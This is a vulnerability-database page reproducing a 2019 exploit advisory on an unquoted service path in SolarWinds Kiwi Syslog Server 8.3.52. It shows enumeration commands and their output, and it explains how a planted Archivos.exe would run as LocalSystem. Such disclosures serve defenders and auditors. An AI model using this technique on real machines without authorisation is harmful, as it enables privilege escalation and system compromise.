SolarWinds Kiwi Syslog Server 8.3.52 Unquoted Service Path - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1817632 漏洞类型
发布时间 2019-11-10 更新时间 2019-11-10
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019110054
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: SolarWinds Kiwi Syslog Server 8.3.52 - 'Kiwi Syslog Server' Unquoted Service Path
# Date: 2019-11-08
# Exploit Author: Carlos A Garcia R
# Vendor Homepage: https://www.kiwisyslog.com/
# Software Link: https://www.kiwisyslog.com/downloads
# Version: 8.3.52
# Tested on: Windows XP Professional Service Pack 3

# Description:
# SolarWinds Kiwi Syslog Server 8.3.52 is an affordable software to manage syslog messages, SNMP traps, and Windows event logs

# PoC:

# C:\>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

Kiwi Syslog Server	Kiwi Syslog Server	C:\Archivos de programa\Syslogd\Syslogd_Service.exe	Auto

# C:\>sc qc "Kiwi Syslog Server"
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: Kiwi Syslog Server
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Archivos de programa\Syslogd\Syslogd_Service.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Kiwi Syslog Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

 
# Exploit
Using the BINARY_PATH_NAME listed above, an executable named "Archivos.exe" 
could be placed in "C:\", and it would be executed as the Local System user 
next time the service was restarted.